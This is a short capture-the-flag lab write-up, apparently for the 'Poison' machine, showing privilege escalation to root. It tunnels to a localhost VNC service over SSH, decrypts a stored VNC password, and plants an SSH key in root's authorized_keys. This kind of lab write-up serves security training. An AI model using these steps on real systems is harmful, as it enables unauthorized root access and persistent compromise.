4 privesc vncviewer > root
charix@Poison:~ % netstat -anp tcp
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp4 0 44 10.10.10.84.22 10.10.16.5.34152 ESTABLISHED
tcp4 0 0 127.0.0.1.25 *.* LISTEN
tcp4 0 0 *.80 *.* LISTEN
tcp6 0 0 *.80 *.* LISTEN
tcp4 0 0 *.22 *.* LISTEN
tcp6 0 0 *.22 *.* LISTEN
tcp4 0 0 127.0.0.1.5801 *.* LISTEN
tcp4 0 0 127.0.0.1.5901 *.* LISTEN
# vnc is running on it using ps auxww
root 529 0.0 0.9 23608 9020 v0- I 22:54 0:00.04 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5901 -localhost -nolisten tcp :1
# port forwarding to connect to vnc
$ ssh -L 5000:localhost:5901 charix@10.10.10.84
Using https://github.com/trinitronx/vncpasswd.py
# can decrypt secret?
$ /opt/vncpasswd.py/vncpasswd.py -d -f secret
Decrypted Bin Pass= 'VNCP@$$!'
Decrypted Hex Pass= '564e435040242421'
# can use remmina or
# vncviewer localhost:5000 -passwd secret
# tried sticky bandit, had issues with running /bin/csh
# made /etc/passwd writable and wrote a new line but then su errors; sudo is missing
# put id_rsa.pub in /root/.ssh/authorized_keys
# finally worked
$ ssh -i id_rsa root@10.10.10.84
root@Poison:~ # whoami;id
root
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
Last updated